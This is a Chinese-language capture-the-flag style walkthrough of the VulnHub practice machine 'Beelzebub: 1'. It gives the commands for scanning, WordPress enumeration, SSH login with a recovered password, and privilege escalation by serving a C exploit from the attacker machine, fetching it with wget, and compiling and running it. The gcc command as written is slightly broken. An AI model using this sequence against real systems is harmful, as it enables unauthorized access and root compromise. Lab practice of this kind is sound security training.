靶机介绍
虚拟机链接:Beelzebub: 1 ~ VulnHub
参考博客:Beelzebub Writeup - Vulnhub - Walkthrough - Security
开始练习
本机ip:192.168.60.130
目的机ip:192.168.60.131
netdiscover找到ip
netdiscover -r 192.168.60.0/24
nmap扫描开放服务端口
nmap -A 192.168.60.131
访问80口,dirsearch枚举目录
dirsearch -u http://192.168.60.131
逐个访问,index.php页面的状态码为200,却是404的页面,且apache版本和nmap扫描出的不匹配,查看代码发现是写的静态页面,有注释提示
将“beelzebub"经过MD5计算后,访问并扫描该目录,根据结构判断其为一个wordpress站点
dirsearch -u http://192.168.60.131/d18e1e22becbd915b45e0e655429d487/
使用wpscan并利用api接口扫描该站点,获得了用户名信息和可能利用的漏洞,同时访问枚举出的目录,uploads页可以访问,文本框处随意输入值提交,再次查看报文在cookie处有密码
wpscan --api-token=#这里写自己在wpscan注册获得的apitoken# --url=http://192.168.60.131/d18e1e22becbd915b45e0e655429d487/ -e --plugins-detection aggressive --ignore-main-redirect --force
尝试登录之前的管理页面无果,总是会跳转到192.168.1.6,具体原因可以查看文章头部参考博客中的相关解释,转向尝试登录ssh,krampus成功登录
ssh 192.168.60.131 -l krampus
查看命令历史记录,没有被清空,并且能发现可疑记录
cat .bash_history
本机从链接下载该.c文件,打开httpsever服务,靶机利用wget获取该文件
#下载链接中的文件,我命名为了001.c
python -m SimpleHTTPServer #以上为本机下载文件后开启服务
wget 192.168.60.130/001.c #靶机获取该文件到目录下
查看代码没有问题后,编译运行,成功提权
gcc 001.c 001
./001